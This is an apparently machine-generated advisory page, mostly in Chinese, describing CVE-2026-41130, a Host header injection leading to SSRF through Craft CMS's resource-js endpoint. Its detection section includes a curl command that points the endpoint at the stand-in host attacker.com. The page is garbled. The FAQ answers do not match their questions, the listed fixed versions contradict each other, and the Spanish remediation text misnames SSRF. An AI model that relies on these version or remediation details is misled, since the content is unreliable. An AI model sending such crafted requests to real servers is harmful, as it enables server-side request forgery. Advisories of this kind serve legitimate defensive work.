MEDIUMCVE-2026-41130

Craft CMS存在主机头注入问题，导致通过resource-js端点进行SSRF

Q: CVE-2026-41130 是什么 — Craft CMS 中的 SSRF？

这是一个配置设置，用于定义 Craft CMS 认为可信的域名。如果未配置，Craft CMS 会信任客户端提供的 'Host' 头。

Q: Craft CMS 中的 CVE-2026-41130 是否会影响我？

在 Craft CMS 配置文件的 'trustedHosts' 选项中明确配置，以仅包含受信任的域名。

Q: 如何修复 Craft CMS 中的 CVE-2026-41130？

是的，所有使用 4.17.9 之前的版本的网站都可能存在漏洞，尤其是那些尚未明确配置 'trustedHosts' 的网站。

Q: CVE-2026-41130 是否正在被积极利用？

检查您使用的 Craft CMS 版本。如果版本较旧，您的网站可能容易受到攻击。

Q: 在哪里可以找到 Craft CMS 关于 CVE-2026-41130 的官方安全通告？

目前没有专门的工具来检测此漏洞，但建议手动审查您的 Craft CMS 配置。

平台

php

组件

craftcms

修复版本

5.0.1

4.0.1

5.9.15

AI Confidence: highNVDEPSS 0.0%已审阅: 2026年5月

在NVD查看

保存

正在翻译为您的语言…

CVE-2026-41130 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in Craft CMS. This flaw allows unauthenticated attackers to proxy remote JavaScript resources by manipulating the Host header. The vulnerability impacts versions 4.0.0-RC1 through 5.9.14, and a fix is available in version 4.17.9.

影响与攻击场景

Craft CMS 中的 CVE-2026-41130 允许未经验证的请求作为远程 JavaScript 资源的代理。这是因为，如果未明确限制 'trustedHosts'，Craft CMS 默认情况下会信任客户端提供的 'Host' 头。攻击者可以操纵此头来控制派生的 'baseUrl'，该 'baseUrl' 在 'actionResourceJs()' 中的前缀验证中使用。这使得攻击者能够强制服务器发出任意 HTTP 请求，可能导致服务器端请求伪造 (SSRF) 并暴露敏感数据或在服务器上执行恶意代码。如果网站使用第三方服务或服务器可以访问内部资源，则风险尤其高。

利用背景

攻击者可以通过向 Craft CMS 的 'resource-js' 端点发送专门制作的 HTTP 请求来利用此漏洞。此请求将包含一个恶意 'Host' 头，该头指向攻击者控制的域名。Craft CMS 信任此头后，将构建一个不正确的 'baseUrl' 并在尝试加载 JavaScript 资源时，向攻击者控制的服务器发送请求，从而可能允许攻击者拦截或操纵流量。

哪些人处于风险中翻译中…

Craft CMS installations running versions 4.0.0-RC1 through 5.9.14 are at risk. This includes deployments using the default configuration where trustedHosts is not explicitly restricted. Shared hosting environments running Craft CMS are particularly vulnerable due to the potential for cross-tenant exploitation.

检测步骤翻译中…

• php / server:

grep -r 'actionResourceJs()' /path/to/craft-cms/app/controllers/AppController.php

• generic web:

curl -I https://your-craft-cms-site.com/resource-js?resource=https://attacker.com

Examine the response headers for unexpected Content-Security-Policy directives or other anomalies. • generic web: Review Craft CMS access and error logs for requests to unusual or unexpected domains via the resource-js endpoint.

攻击时间线

2026-04-21Disclosure
disclosure

威胁情报

漏洞利用状态

概念验证未知

CISA KEVNO

报告1 份威胁报告

EPSS

0.05% (14% 百分位)

CISA SSVC

利用情况poc

可自动化yes

技术影响partial

受影响的软件

组件craftcms

供应商craftcms

影响范围修复版本

>= 5.0.0-RC1, < 5.9.15 – >= 5.0.0-RC1, < 5.9.155.0.1

>= 4.0.0-RC1, < 4.17.9 – >= 4.0.0-RC1, < 4.17.94.0.1

5.0.0-RC15.9.15

弱点分类 (CWE)

CWE-918

时间线

已保留2026-04-17
发布日期2026-04-21
修改日期2026-04-22
EPSS 更新日期2026-04-29

缓解措施和替代方案

建议的解决方案是将 Craft CMS 更新到 4.17.9 或更高版本。此版本包含修复程序，该修复程序限制了客户端提供的 'Host' 头的使用。如果无法立即更新，则可以在 Craft CMS 配置文件的 'trustedHosts' 选项中明确配置，以仅包含受信任的域名。为了降低此风险并保护敏感数据，至关重要的是审查并更新您的 Craft CMS 安全配置。

修复方法翻译中…

Actualice Craft CMS a la versión 4.17.9 o superior, o a la versión 5.9.15 o superior. Esta actualización corrige la vulnerabilidad de inyección del encabezado Host que permite ataques de falsificación de solicitudes entre sitios (SSRF) al restringir la confianza en el encabezado Host proporcionado por el cliente.

CVE 安全通讯

漏洞分析和关键警报直接发送到您的邮箱。

常见问题

CVE-2026-41130 是什么 — Craft CMS 中的 SSRF？